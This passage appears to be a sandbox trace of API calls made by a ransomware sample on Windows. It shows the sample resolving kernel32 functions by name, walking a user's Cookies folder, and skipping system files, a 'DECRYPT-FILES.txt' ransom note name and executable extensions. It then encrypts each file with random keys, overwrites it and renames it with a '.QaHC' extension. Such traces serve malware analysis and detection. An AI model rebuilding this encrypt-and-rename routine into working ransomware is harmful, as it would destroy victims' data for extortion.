lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.936] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.936] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.937] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.937] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.937] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.937] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.937] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.937] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.937] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.937] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.937] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.937] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.937] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.937] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.937] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.937] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.937] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.937] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.937] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.937] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.937] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.937] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.938] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.938] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.938] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.938] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.938] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.938] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.938] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.938] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.938] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.938] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.938] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.938] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.938] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.938] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.938] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.938] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.938] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.938] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.938] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.939] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.939] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt") returned 111 [0078.939] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC") returned 116 [0078.939] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.qahc"), dwFlags=0x0) returned 1 [0078.940] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.940] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.940] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.940] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86af2d0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x2c7870d0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2c7870d0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x114, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@google[2].txt", cAlternateFileName="5P5NRG~2.TXT")) returned 1 [0078.941] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0078.941] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt", lpString2="autorun.inf") returned -1 [0078.941] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt", lpString2="boot.ini") returned -1 [0078.941] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt", lpString2="desktop.ini") returned -1 [0078.941] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt", lpString2="ntuser.dat") returned -1 [0078.941] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt", lpString2="iconcache.db") returned -1 [0078.941] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt", lpString2="bootsect.bak") returned -1 [0078.941] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt", lpString2="ntuser.dat.log") returned -1 [0078.941] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt", lpString2="thumbs.db") returned -1 [0078.941] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@google[2].txt", lpString2="Bootfont.bin") returned -1 [0078.941] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@google[2].txt") returned 34 [0078.941] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0078.941] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0078.941] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0078.941] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0078.941] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0078.941] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@google[2].txt") returned 34 [0078.941] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0078.941] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="5p5nrgjn0js_halpmcxz@google[2].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt" [0078.941] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.941] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.942] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=276) returned 1 [0078.942] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.942] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.943] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.943] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.943] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.943] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.943] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.944] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.944] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.944] CloseHandle (hObject=0x45c) returned 1 [0078.944] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.944] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.945] CloseHandle (hObject=0x0) returned 0 [0078.945] CloseHandle (hObject=0x458) returned 1 [0078.946] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.946] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.946] GetTickCount () returned 0x114c3ad [0078.946] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.947] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.947] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.947] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.947] lstrlenA (lpString="kernel32.dll") returned 12 [0078.947] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.947] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.947] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.947] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.947] lstrlenA (lpString="ADDATOMA") returned 8 [0078.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.947] lstrlenA (lpString="ADDATOMW") returned 8 [0078.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.948] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.948] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.948] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.948] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.948] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.948] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.949] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.949] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.949] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.949] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.949] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.950] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.950] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.950] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.950] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.950] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.950] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.950] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.950] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.950] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.950] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.950] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.950] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.950] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.950] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.950] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.950] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.950] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.950] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.951] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.951] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.951] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.951] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.951] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.951] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.951] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.951] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.951] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.951] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.951] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | 